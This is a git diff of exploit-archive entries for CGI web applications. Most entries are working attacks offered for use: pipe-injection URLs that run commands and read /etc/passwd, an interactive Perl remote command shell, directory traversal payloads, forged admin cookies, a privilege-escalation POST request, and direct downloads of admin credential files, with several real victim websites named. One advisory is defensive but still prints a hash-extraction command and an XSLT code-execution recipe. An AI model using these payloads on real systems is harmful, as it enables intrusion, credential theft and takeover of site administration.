@@ -1,23 +1,23 @@ - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - - -Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability -Script : ): -POC : - |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down_file - |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file - |---> Open By Mozilla Firefox -Dork : http://www.google.com.ly/search?hl=ar&q=SPBOARD+v4.5 - - ____ _ _ __ __ - / ___| ___ | | __| | | \/ | - | | _ / _ \ | | / _` | | |\/| | - | |_| | | (_) | | |___ | (_| | | | | | - \____| \___/ |_____| \__,_| _____ |_| |_| - |_____| - -# milw0rm.com [2008-10-29] + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + + +Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability +Script : ): +POC : + |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down_file + |---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file + |---> Open By Mozilla Firefox +Dork : http://www.google.com.ly/search?hl=ar&q=SPBOARD+v4.5 + + ____ _ _ __ __ + / ___| ___ | | __| | | \/ | + | | _ / _ \ | | / _` | | |\/| | + | |_| | | (_) | | |___ | (_| | | | | | + \____| \___/ |_____| \__,_| _____ |_| |_| + |_____| + +# milw0rm.com [2008-10-29] diff --git a/platforms/cgi/webapps/7404.txt b/platforms/cgi/webapps/7404.txt index 904e08e29..6c01b099c 100755 --- a/platforms/cgi/webapps/7404.txt +++ b/platforms/cgi/webapps/7404.txt 
@@ -1,27 +1,27 @@ -Software : HTMPL v1.11 -Download Link : http://vmeste.org/templ_ex/doc/1.html -Vulnrability : Command Execution -Severity : High -Author : ZeN -Website : http://dusecurity.com / http://darkcode.me/ - -Exploit : -site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd - - -A few other little..... tricks -The admins password is kept plaintext in the file 'adminpass', you can just access it directly -in the same directory. - -Thanks str0ke ;) - -Shouts to : -DU Security Group -DarkCoders -WL-Group -Milw0rm -EnigmaGroup -IWannaHack -HackHound - -# milw0rm.com [2008-12-10] +Software : HTMPL v1.11 +Download Link : http://vmeste.org/templ_ex/doc/1.html +Vulnrability : Command Execution +Severity : High +Author : ZeN +Website : http://dusecurity.com / http://darkcode.me/ + +Exploit : +site.com/cgi-bin/htmpl_admin.cgi?help=|cat /etc/passwd + + +A few other little..... tricks +The admins password is kept plaintext in the file 'adminpass', you can just access it directly +in the same directory. + +Thanks str0ke ;) + +Shouts to : +DU Security Group +DarkCoders +WL-Group +Milw0rm +EnigmaGroup +IWannaHack +HackHound + +# milw0rm.com [2008-12-10] diff --git a/platforms/cgi/webapps/7753.pl b/platforms/cgi/webapps/7753.pl index 61c5621fe..8a8d28562 100755 --- a/platforms/cgi/webapps/7753.pl +++ b/platforms/cgi/webapps/7753.pl 
@@ -1,53 +1,53 @@ -#!/usr/bin/perl -use IO::Socket; - -print q{ - -HSpell v1.1 Command Execution Exploit - -Theres a 1000 ways to improve this exploit, -but I really couldn't be fucked with it. - -Made By ZeN -http://dusecurity.com/ -http://darkcode.me/ - -}; - - -$host = 'site.com'; -$port = '80'; -$path = '/cgi-bin/cilla.cgi'; - -ShellMe: - -print "\nh4x0r~> "; -$cmd = ; -chop ($cmd); - -$cmd =~ s/\ /+/g; - - -$header = "GET ".$path."?root=pwnt%3B+".$cmd."&binyan=%F7%EC HTTP/1.1\r\n"; -$header = $header."Host: ".$host."\r\n"; -$header = $header."User-Agent: DUSecurity Group\r\n"; -$header = $header."Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; -$header = $header."Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; -$header = $header."Accept-Encoding: gzip,deflate\r\n"; -$header = $header."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; -$header = $header."Connection: close\r\n"; -$header = $header."Cache-Control: max-age=0\r\n"; -$header = $header."\r\n"; - - -$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || print "[*] Error!\n"; -print $get1 $header; -$get1->recv($buffer,50000); - -$shell = substr($buffer, 1347); - -print $shell; - -goto ShellMe; - -# milw0rm.com [2009-01-13] +#!/usr/bin/perl +use IO::Socket; + +print q{ + +HSpell v1.1 Command Execution Exploit + +Theres a 1000 ways to improve this exploit, +but I really couldn't be fucked with it. 
+ +Made By ZeN +http://dusecurity.com/ +http://darkcode.me/ + +}; + + +$host = 'site.com'; +$port = '80'; +$path = '/cgi-bin/cilla.cgi'; + +ShellMe: + +print "\nh4x0r~> "; +$cmd = ; +chop ($cmd); + +$cmd =~ s/\ /+/g; + + +$header = "GET ".$path."?root=pwnt%3B+".$cmd."&binyan=%F7%EC HTTP/1.1\r\n"; +$header = $header."Host: ".$host."\r\n"; +$header = $header."User-Agent: DUSecurity Group\r\n"; +$header = $header."Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; +$header = $header."Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\r\n"; +$header = $header."Accept-Encoding: gzip,deflate\r\n"; +$header = $header."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; +$header = $header."Connection: close\r\n"; +$header = $header."Cache-Control: max-age=0\r\n"; +$header = $header."\r\n"; + + +$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port") || print "[*] Error!\n"; +print $get1 $header; +$get1->recv($buffer,50000); + +$shell = substr($buffer, 1347); + +print $shell; + +goto ShellMe; + +# milw0rm.com [2009-01-13] diff --git a/platforms/cgi/webapps/8085.txt b/platforms/cgi/webapps/8085.txt index cf5d58322..8e2083b86 100755 --- a/platforms/cgi/webapps/8085.txt +++ b/platforms/cgi/webapps/8085.txt 
@@ -1,18 +1,18 @@ -######################################################### ---------------------------------------------------------- -Portal Name: i-dreams Mailer -Version : 1.2 Final -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Website: http://Pouya-Server.ir ---------------------------------------------------------- -######################################################### -[Xpl]: -http://site.com/cgi-bin/budmail/data/admin.dat ------------------------------------------- -Victem : -http://www.ttscreens.co.uk -http://www.roadkilleyeware.com ---------------------------------------------------------- -######################################################### - -# milw0rm.com [2009-02-20] +######################################################### +--------------------------------------------------------- +Portal Name: i-dreams Mailer +Version : 1.2 Final +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Website: http://Pouya-Server.ir +--------------------------------------------------------- +######################################################### +[Xpl]: +http://site.com/cgi-bin/budmail/data/admin.dat +------------------------------------------ +Victem : +http://www.ttscreens.co.uk +http://www.roadkilleyeware.com +--------------------------------------------------------- +######################################################### + +# milw0rm.com [2009-02-20] diff --git a/platforms/cgi/webapps/8086.txt b/platforms/cgi/webapps/8086.txt index 976452a19..ae19c846a 100755 --- a/platforms/cgi/webapps/8086.txt +++ b/platforms/cgi/webapps/8086.txt 
@@ -1,19 +1,19 @@ -######################################################### ---------------------------------------------------------- -Portal Name: i-dreams.net GB -Version : 5.4 Final -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Website: http://Pouya-Server.ir ---------------------------------------------------------- -######################################################### -[Xpl]: -http://site.com/firebook/data/admdat/admin.dat ------------------------------------------- -Victem : -http://www.elsapo77.com -http://www.astro-partner.eu/cgi-bin -http://www.zarembowicz.de/cgi-bin ---------------------------------------------------------- -######################################################### - -# milw0rm.com [2009-02-20] +######################################################### +--------------------------------------------------------- +Portal Name: i-dreams.net GB +Version : 5.4 Final +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Website: http://Pouya-Server.ir +--------------------------------------------------------- +######################################################### +[Xpl]: +http://site.com/firebook/data/admdat/admin.dat +------------------------------------------ +Victem : +http://www.elsapo77.com +http://www.astro-partner.eu/cgi-bin +http://www.zarembowicz.de/cgi-bin +--------------------------------------------------------- +######################################################### + +# milw0rm.com [2009-02-20] diff --git a/platforms/cgi/webapps/8087.txt b/platforms/cgi/webapps/8087.txt index 8a8de6b84..94f620575 100755 --- a/platforms/cgi/webapps/8087.txt +++ b/platforms/cgi/webapps/8087.txt 
@@ -1,16 +1,16 @@ -######################################################### ---------------------------------------------------------- -Portal Name: i-dreams.net GB Server -Author : Pouya_Server , Pouya.s3rver@Gmail.com -Website: http://Pouya-Server.ir ---------------------------------------------------------- -######################################################### -[Xpl]: -http://site.com/[Path]/admdat/admin.dat ------------------------------------------- -Victem : -http://www.comp-tech.at/guestbook/users/demo ---------------------------------------------------------- -######################################################### - -# milw0rm.com [2009-02-20] +######################################################### +--------------------------------------------------------- +Portal Name: i-dreams.net GB Server +Author : Pouya_Server , Pouya.s3rver@Gmail.com +Website: http://Pouya-Server.ir +--------------------------------------------------------- +######################################################### +[Xpl]: +http://site.com/[Path]/admdat/admin.dat +------------------------------------------ +Victem : +http://www.comp-tech.at/guestbook/users/demo +--------------------------------------------------------- +######################################################### + +# milw0rm.com [2009-02-20] diff --git a/platforms/cgi/webapps/8247.txt b/platforms/cgi/webapps/8247.txt index f9399a6fc..f626ac1b3 100755 --- a/platforms/cgi/webapps/8247.txt +++ b/platforms/cgi/webapps/8247.txt 
@@ -1,164 +1,164 @@ -Emory University UTS Security Advisory EMORY-2009-01 - -Topic: Command Execution in Hannon Hill Cascade Server - -Original release date: March 19, 2009 - -SUMMARY -======= - -Hannon Hill's Cascade Server product is vulnerable to a command -execution vulnerability. An attacker with access to an unprivileged -account within Cascade Server could exploit this vulnerability to run -arbitrary commands on the system with the privileges of the user who -started Cascade Server. - -AFFECTED SOFTWARE -================= - -* Cascade Server, all versions - -IMPACT -====== - -An attacker with access to an unprivileged account within Cascade -Server could exploit this vulnerability to run arbitrary commands on -the system with the privileges of the user who started Cascade Server. - -The privileges of that user are necessarily sufficient to gain full -administrative control of Cascade Server - elevate privileges, conduct -denial of service, etc. - -DETAILS -======= - -Cascade Server allows its users to write XSLT stylesheets which it -uses to transform XML source data into HTML or other formats. Cascade -Server employs the Apache XML Project's Xalan-Java XSLT processor to -perform these transformations. - -The Xalan-Java site states, "For those situations where you would like -to augment the functionality of XSLT with calls to a procedural -language, Xalan-Java supports the creation and use of extension -elements and extension functions... Extensions written in Java are -directly supported by Xalan-Java." - -Because Cascade Server does not restrict the kind of XSLT code users -are able to enter, any user with access to edit XSLT stylesheets can -cause Cascade Server to execute arbitrary Java code. Using the -java.lang.Runtime class, Java can run shell commands. 
- -While the privilege level of the Cascade Server process may prevent -an attacker from gaining complete control of the host system, that -privilege level is necessarily sufficient to gain full control of -Cascade Server. - -SOLUTION -======== - -No full solution exists at this time, but see Recommendations, below. - -Hannon Hill is working to develop an official solution, and customers may -wish to monitor its progress using the Hannon Hill ticketing system -(requires a customer account). - -http://support.hannonhill.com/browse/CSCD-4753 - -RECOMMENDATIONS -=============== - -It may be possible to limit exposure in the following ways: - -* Grant the ability to edit XSLT files only to trusted users. - -* Enforce strong passwords for accounts with XSLT editing privileges. -Cascade stores user passwords as base64 encoded SHA1 hashes in the -password field of the cxml_user table, and can be audited with any -SHA1-capable password cracker. For example, to extract hashes from a -MySQL database in a form useable by John the Ripper's -(http://www.openwall.com/john/) raw-sha1 format: - -echo "select userName, password from cxml_user" \ - | mysql cascade \ - | perl -i -ne 'use MIME::Base64; /^(.*?)\t(.*)/ && print "$1:" . unpack("H*", decode_base64($2))."\n"' - -* Run Cascade Server as a user with as few privileges as possible. - -* On UNIX systems, run Cascade Server in a chroot environment. - -EXPLOIT -======= - -This exploit example assumes the ability to create and edit blocks, -stylesheets, and pages. It's also possible to exploit the -vulnerability simply by modifying an existing stylesheet. - -Create a stylesheet with the following contents: - - - - - - - - - -

- Output:
-

-
-
- -Create an XML block with the following contents, substituting your own -command or commands. - -id -uname -a -... - -Create or edit a page using a template with at least one region defined. -Under the configuration tab, set Block to point to your XML block and -Stylesheet (AKA Layout in Cascade 5.7+) to point to your stylesheet. - -View the layout or preview tab for that page, and you should see the -output of your commands. Note that the above stylesheet is only able -to display the first line of output. - -ACKNOWLEDGMENTS -=============== - -Thanks to Bradley Wagner and Hannon Hill in general for their quick -initial response to the problem. - -Thanks to Amy Liu and Brett Goodwin of Hannon Hill for their "Advanced -XSLT" talk at the 2008 Cascade Server User's Conference, which -inspired this research. - -DISCLAIMER -========== - -The information in this advisory is provided by Emory as a courtesy -and without any representations or warranties. Recipients are -advised to conduct their own investigation and due diligence before -relying on its contents. - -VULNERABILTY HISTORY -==================== - -2008-10-01 Vulnerability discovered - Hannon Hill notified - Ticket opened in Hannon Hill issue tracker - -2008-10-15 Hannon Hill staff member assigned to the issue - -2009-02-23 Hannon Hill staff member reassigned - -2009-03-19 Initial revision of advisory published - -# milw0rm.com [2009-03-19] +Emory University UTS Security Advisory EMORY-2009-01 + +Topic: Command Execution in Hannon Hill Cascade Server + +Original release date: March 19, 2009 + +SUMMARY +======= + +Hannon Hill's Cascade Server product is vulnerable to a command +execution vulnerability. An attacker with access to an unprivileged +account within Cascade Server could exploit this vulnerability to run +arbitrary commands on the system with the privileges of the user who +started Cascade Server. 
+ +AFFECTED SOFTWARE +================= + +* Cascade Server, all versions + +IMPACT +====== + +An attacker with access to an unprivileged account within Cascade +Server could exploit this vulnerability to run arbitrary commands on +the system with the privileges of the user who started Cascade Server. + +The privileges of that user are necessarily sufficient to gain full +administrative control of Cascade Server - elevate privileges, conduct +denial of service, etc. + +DETAILS +======= + +Cascade Server allows its users to write XSLT stylesheets which it +uses to transform XML source data into HTML or other formats. Cascade +Server employs the Apache XML Project's Xalan-Java XSLT processor to +perform these transformations. + +The Xalan-Java site states, "For those situations where you would like +to augment the functionality of XSLT with calls to a procedural +language, Xalan-Java supports the creation and use of extension +elements and extension functions... Extensions written in Java are +directly supported by Xalan-Java." + +Because Cascade Server does not restrict the kind of XSLT code users +are able to enter, any user with access to edit XSLT stylesheets can +cause Cascade Server to execute arbitrary Java code. Using the +java.lang.Runtime class, Java can run shell commands. + +While the privilege level of the Cascade Server process may prevent +an attacker from gaining complete control of the host system, that +privilege level is necessarily sufficient to gain full control of +Cascade Server. + +SOLUTION +======== + +No full solution exists at this time, but see Recommendations, below. + +Hannon Hill is working to develop an official solution, and customers may +wish to monitor its progress using the Hannon Hill ticketing system +(requires a customer account). 
+ +http://support.hannonhill.com/browse/CSCD-4753 + +RECOMMENDATIONS +=============== + +It may be possible to limit exposure in the following ways: + +* Grant the ability to edit XSLT files only to trusted users. + +* Enforce strong passwords for accounts with XSLT editing privileges. +Cascade stores user passwords as base64 encoded SHA1 hashes in the +password field of the cxml_user table, and can be audited with any +SHA1-capable password cracker. For example, to extract hashes from a +MySQL database in a form useable by John the Ripper's +(http://www.openwall.com/john/) raw-sha1 format: + +echo "select userName, password from cxml_user" \ + | mysql cascade \ + | perl -i -ne 'use MIME::Base64; /^(.*?)\t(.*)/ && print "$1:" . unpack("H*", decode_base64($2))."\n"' + +* Run Cascade Server as a user with as few privileges as possible. + +* On UNIX systems, run Cascade Server in a chroot environment. + +EXPLOIT +======= + +This exploit example assumes the ability to create and edit blocks, +stylesheets, and pages. It's also possible to exploit the +vulnerability simply by modifying an existing stylesheet. + +Create a stylesheet with the following contents: + + + + + + + + + +

+ Output:
+

+
+
+ +Create an XML block with the following contents, substituting your own +command or commands. + +id +uname -a +... + +Create or edit a page using a template with at least one region defined. +Under the configuration tab, set Block to point to your XML block and +Stylesheet (AKA Layout in Cascade 5.7+) to point to your stylesheet. + +View the layout or preview tab for that page, and you should see the +output of your commands. Note that the above stylesheet is only able +to display the first line of output. + +ACKNOWLEDGMENTS +=============== + +Thanks to Bradley Wagner and Hannon Hill in general for their quick +initial response to the problem. + +Thanks to Amy Liu and Brett Goodwin of Hannon Hill for their "Advanced +XSLT" talk at the 2008 Cascade Server User's Conference, which +inspired this research. + +DISCLAIMER +========== + +The information in this advisory is provided by Emory as a courtesy +and without any representations or warranties. Recipients are +advised to conduct their own investigation and due diligence before +relying on its contents. + +VULNERABILTY HISTORY +==================== + +2008-10-01 Vulnerability discovered + Hannon Hill notified + Ticket opened in Hannon Hill issue tracker + +2008-10-15 Hannon Hill staff member assigned to the issue + +2009-02-23 Hannon Hill staff member reassigned + +2009-03-19 Initial revision of advisory published + +# milw0rm.com [2009-03-19] diff --git a/platforms/cgi/webapps/862.txt b/platforms/cgi/webapps/862.txt index beb22ba8d..de968cb50 100755 --- a/platforms/cgi/webapps/862.txt +++ b/platforms/cgi/webapps/862.txt @@ -1,6 +1,6 @@ Remote Command Execution on: Example I.: www.host-vulnerable.com/includer.cgi?|id| -Example II.: www.host-vulnerable.com/includer.cgi?template=|id| - -# milw0rm.com [2005-03-07] +Example II.: www.host-vulnerable.com/includer.cgi?template=|id| + +# milw0rm.com [2005-03-07] 
diff --git a/platforms/cgi/webapps/8895.txt b/platforms/cgi/webapps/8895.txt index f88ccfc12..6e6c8fd31 100755 --- a/platforms/cgi/webapps/8895.txt +++ b/platforms/cgi/webapps/8895.txt 
@@ -1,58 +1,58 @@ -[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 06/06/2009 -[~] -[~] Home: yildirimordulari.com / z0rlu.blogspot.com -[~] -[~] msn: trt-turk@hotmail.com -[~] -[~] N0T: Kpss AnanI .... -[~] ----------------------------------------------------------- - -desc: - -normal login for cookie - -pmadm=dGVzdA; - -if ý do this: - -pmadm=dGVzd(write any thing); - -example: - -pmadm=dGVzdz; - -or - -pmadm=dGVzd123231212313; - -not login - -if ý do wthis: - -pmadm=dGVzd ' or '; - -boom this loggin :D - -exp: - -javascript:document.cookie = "pmadm=dGVzd ' or '; path=/"; - -after you go here: - -http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp - -or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends -[~] -[~] yildirimordulari.com / z0rlu.blogspot.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2009-06-08] +[~] interlogy Profile Manager Basic (for ByPass) Insecure Cookie Handling Vulnerability +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 06/06/2009 +[~] +[~] Home: yildirimordulari.com / z0rlu.blogspot.com +[~] +[~] msn: trt-turk@hotmail.com +[~] +[~] N0T: Kpss AnanI .... 
+[~] ----------------------------------------------------------- + +desc: + +normal login for cookie + +pmadm=dGVzdA; + +if ý do this: + +pmadm=dGVzd(write any thing); + +example: + +pmadm=dGVzdz; + +or + +pmadm=dGVzd123231212313; + +not login + +if ý do wthis: + +pmadm=dGVzd ' or '; + +boom this loggin :D + +exp: + +javascript:document.cookie = "pmadm=dGVzd ' or '; path=/"; + +after you go here: + +http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp + +or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX and all friends +[~] +[~] yildirimordulari.com / z0rlu.blogspot.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2009-06-08] diff --git a/platforms/cgi/webapps/8987.txt b/platforms/cgi/webapps/8987.txt index 6e02d6038..61b14a30b 100755 --- a/platforms/cgi/webapps/8987.txt +++ b/platforms/cgi/webapps/8987.txt 
@@ -1,35 +1,35 @@ --------------------------------------------- - -MIDAS Insecure Cookie Handling Vulnerability - --------------------------------------------- - -Author.: HxH - -Contact: HxH[at]live[dot]at - ---------------------------- - -Script.: MIDAS - -Home...: http://mid.as - -------------------------------------------------------------------------------------------------- - -Exploit: javascript:document.cookie="MIDAS=admin|Administrator|1|data0n9a|en-US|Default; path=/"; - -Note...: After make cookie go direct to http://[website]/[script]/level1.pl?x=0 - -------------------------------------------------------------------------------------------------- - -Demo...: http://demo.mid.as - -Panel..: http://demo.mid.as/level1.pl?x=0 - ------------------------------------------ - -Greetz.: ~ Jiko ~ Sniper Code - ------------------------------ - -# milw0rm.com [2009-06-22] +-------------------------------------------- + +MIDAS Insecure Cookie Handling Vulnerability + +-------------------------------------------- + +Author.: HxH + +Contact: HxH[at]live[dot]at + +--------------------------- + +Script.: MIDAS + +Home...: http://mid.as + +------------------------------------------------------------------------------------------------- + +Exploit: javascript:document.cookie="MIDAS=admin|Administrator|1|data0n9a|en-US|Default; path=/"; + +Note...: After make cookie go direct to http://[website]/[script]/level1.pl?x=0 + +------------------------------------------------------------------------------------------------- + +Demo...: http://demo.mid.as + +Panel..: http://demo.mid.as/level1.pl?x=0 + +----------------------------------------- + +Greetz.: ~ Jiko ~ Sniper Code + +----------------------------- + +# milw0rm.com [2009-06-22] diff --git a/platforms/cgi/webapps/9074.txt b/platforms/cgi/webapps/9074.txt index 37ccf24ac..457eee802 100755 --- a/platforms/cgi/webapps/9074.txt +++ b/platforms/cgi/webapps/9074.txt 
@@ -1,58 +1,58 @@ -Affected product ----------------- - -Sourcefire 3D Sensor and Defense Center 4.8.x - -Tested on 4.8.0.3 and 4.8.0.4, 3D Sensor 2500 & DC 1000 -All 4.8.x releases, up to and including 4.8.1, confirmed vulnerable by sourcefire. - - -Vulnerability details ---------------------- - -A privilege escalation vulnerability found in the Sensor and the DC web based management interfaces allows any local account -to take over the appliances administrator role. -While the "user.cgi" PERL script correctly validates that incoming requests belong to an authenticated session, in such a case -it also blindly grants read/write access to all accounts configuration with no regard for the role of the request's originator. -Therefore a user with even the lowest level of access (ie. without any role configured) is able to promote himself as administrator -and/or change others roles and account parameters at will. -Depending of the role or roles initially configured for this user, access to the user management page may not be visible -into the interface's layout however the underlying script itself is still reachable and can be invoked "by hand". - -Let's now consider a malicious operator named 'foobar' whose role has been restricted to "Event analyst (read only)". -He would first log in to the appliance using his own credentials in order to get an authenticated session cookie (CGISESSID=xxxxxxxxxxxxxxxxxx) -then he could send a forged POST request similar to the one below: - -POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1 -User-Agent: xxxxxx -Keep-Alive: 300 -Connection: Keep-alive -Cookie: CGISESSID=xxxxxxxxxxxxxxxxxx -Content-Type: application/x-www-form-urlencoded -Content-length: 56 - -mode=edit&username=foobar&admin=%24admin&action_add=Save - -He would thereafter be promoted to administrator by the appliance with full access into the management interface. 
- -As a final note, several other scripts were reported being affected by the same vulnerability after investigation from the vendor. - - -Resolution ----------- - -Upgrade your appliance's software to 4.8.2 available from the Sourcefire's support website located at https://support.sourcefire.com/ - - -Disclosure timeline -------------------- - -2009-05-05: Vulnerability discovered and reported to Sourcefire. -2009-06-30: 4.8.2 released by Sourcefire. -2009-07-01: Public disclosure. - - - -Gregory Duchemin - -# milw0rm.com [2009-07-02] +Affected product +---------------- + +Sourcefire 3D Sensor and Defense Center 4.8.x + +Tested on 4.8.0.3 and 4.8.0.4, 3D Sensor 2500 & DC 1000 +All 4.8.x releases, up to and including 4.8.1, confirmed vulnerable by sourcefire. + + +Vulnerability details +--------------------- + +A privilege escalation vulnerability found in the Sensor and the DC web based management interfaces allows any local account +to take over the appliances administrator role. +While the "user.cgi" PERL script correctly validates that incoming requests belong to an authenticated session, in such a case +it also blindly grants read/write access to all accounts configuration with no regard for the role of the request's originator. +Therefore a user with even the lowest level of access (ie. without any role configured) is able to promote himself as administrator +and/or change others roles and account parameters at will. +Depending of the role or roles initially configured for this user, access to the user management page may not be visible +into the interface's layout however the underlying script itself is still reachable and can be invoked "by hand". + +Let's now consider a malicious operator named 'foobar' whose role has been restricted to "Event analyst (read only)". 
+He would first log in to the appliance using his own credentials in order to get an authenticated session cookie (CGISESSID=xxxxxxxxxxxxxxxxxx)
+then he could send a forged POST request similar to the one below:
+
+POST https://x.x.x.x/admin/user/user.cgi HTTP/1.1
+User-Agent: xxxxxx
+Keep-Alive: 300
+Connection: Keep-alive
+Cookie: CGISESSID=xxxxxxxxxxxxxxxxxx
+Content-Type: application/x-www-form-urlencoded
+Content-length: 56
+
+mode=edit&username=foobar&admin=%24admin&action_add=Save
+
+He would thereafter be promoted to administrator by the appliance with full access into the management interface.
+
+As a final note, several other scripts were reported being affected by the same vulnerability after investigation from the vendor.
+
+
+Resolution
+----------
+
+Upgrade your appliance's software to 4.8.2 available from the Sourcefire's support website located at https://support.sourcefire.com/
+
+
+Disclosure timeline
+-------------------
+
+2009-05-05: Vulnerability discovered and reported to Sourcefire.
+2009-06-30: 4.8.2 released by Sourcefire.
+2009-07-01: Public disclosure.
+
+
+
+Gregory Duchemin
+
+# milw0rm.com [2009-07-02]
diff --git a/platforms/cgi/webapps/9140.txt b/platforms/cgi/webapps/9140.txt
index 49e436e8d..85232fe06 100755
--- a/platforms/cgi/webapps/9140.txt
+++ b/platforms/cgi/webapps/9140.txt
@@ -1,7 +1,7 @@
-Discovered by cibbao
-
-PoC:
-
-/cgi-bin/DJcalendar.cgi?TEMPLATE=/../../../../../../../etc/passwd
-
-# milw0rm.com [2009-07-14]
+Discovered by cibbao
+
+PoC:
+
+/cgi-bin/DJcalendar.cgi?TEMPLATE=/../../../../../../../etc/passwd
+
+# milw0rm.com [2009-07-14]
diff --git a/platforms/cgi/webapps/9357.txt b/platforms/cgi/webapps/9357.txt
index f1f318a1e..f09c795a7 100755
--- a/platforms/cgi/webapps/9357.txt
+++ b/platforms/cgi/webapps/9357.txt
@@ -1,34 +1,34 @@ -A while back I was playing around with Perl$hop, which if you are not -aware, is an e-commerce script developed by Waverider Systems. XSS -(Cross Site Scripting), Directory Traversal, Code Execution, and more! -Wow, that sure is a lot of vulnerabilities for one product. It would -seem as if the developers had little to no regard for web application -security. Which, were this not a free product, I might comment further -upon. As this is not the case, allow me to continue. - -One of the initial vulnerabilities I noticed when viewing the source -code to a product page was the existence of a hidden input field named -ITEM_PRICE. Now we simply download the source to the page, edit the -hidden value of input field ITEM_PRICE to whatever we want, as an -example value=?0.01?, and save. Reopen and purchase the item. The -following checkout page will verify your success or lack thereof. So we -can set our own price, fun stuff! - -Next we examine perlshop.cgi and notice that the script does not -properly sanitize user input. After a little variable injection we find -that the GET variable ?thispage? is vulnerable to a directory traversal -and potential code execution depending on the environment. If you were -hoping for an exploit example, here it is: - -http://target/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar - -And lastly, to save myself the trouble, I?ll just say that the GET -variable CUR, thispage, LANG, and most likely others contain cross site -scripting vulnerabilities. XSS vulnerabilities are not nearly as -critical as the aforementioned directory traversal and code execution -vulnerabilities though they should still be taken seriously as session -fixation attempts could allow a hacker to hijack accounts. 
- -www.shadow.net - -# milw0rm.com [2009-08-04] +A while back I was playing around with Perl$hop, which if you are not +aware, is an e-commerce script developed by Waverider Systems. XSS +(Cross Site Scripting), Directory Traversal, Code Execution, and more! +Wow, that sure is a lot of vulnerabilities for one product. It would +seem as if the developers had little to no regard for web application +security. Which, were this not a free product, I might comment further +upon. As this is not the case, allow me to continue. + +One of the initial vulnerabilities I noticed when viewing the source +code to a product page was the existence of a hidden input field named +ITEM_PRICE. Now we simply download the source to the page, edit the +hidden value of input field ITEM_PRICE to whatever we want, as an +example value=?0.01?, and save. Reopen and purchase the item. The +following checkout page will verify your success or lack thereof. So we +can set our own price, fun stuff! + +Next we examine perlshop.cgi and notice that the script does not +properly sanitize user input. After a little variable injection we find +that the GET variable ?thispage? is vulnerable to a directory traversal +and potential code execution depending on the environment. If you were +hoping for an exploit example, here it is: + +http://target/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar + +And lastly, to save myself the trouble, I?ll just say that the GET +variable CUR, thispage, LANG, and most likely others contain cross site +scripting vulnerabilities. XSS vulnerabilities are not nearly as +critical as the aforementioned directory traversal and code execution +vulnerabilities though they should still be taken seriously as session +fixation attempts could allow a hacker to hijack accounts. + +www.shadow.net + +# milw0rm.com [2009-08-04] 
diff --git a/platforms/cgi/webapps/954.pl b/platforms/cgi/webapps/954.pl
index 83a321baf..47b2434b0 100755
--- a/platforms/cgi/webapps/954.pl
+++ b/platforms/cgi/webapps/954.pl
@@ -67,6 +67,6 @@ print "If connect back shell not found:\n";
 print "- you do not have privileges to write in /tmp\n";
 print "- Shell not vulnerable\n\n\n";
 print "Greetz: albythebest - #badroot irc.us.azzurra.org - #hacker.eu us.ircnet.org\n\n\n";
-
-
-# milw0rm.com [2005-04-25]
+
+
+# milw0rm.com [2005-04-25]
diff --git a/platforms/cgi/webapps/980.pl b/platforms/cgi/webapps/980.pl
index 1a8db5a19..394058fbe 100755
--- a/platforms/cgi/webapps/980.pl
+++ b/platforms/cgi/webapps/980.pl
@@ -166,6 +166,6 @@ print "\n";
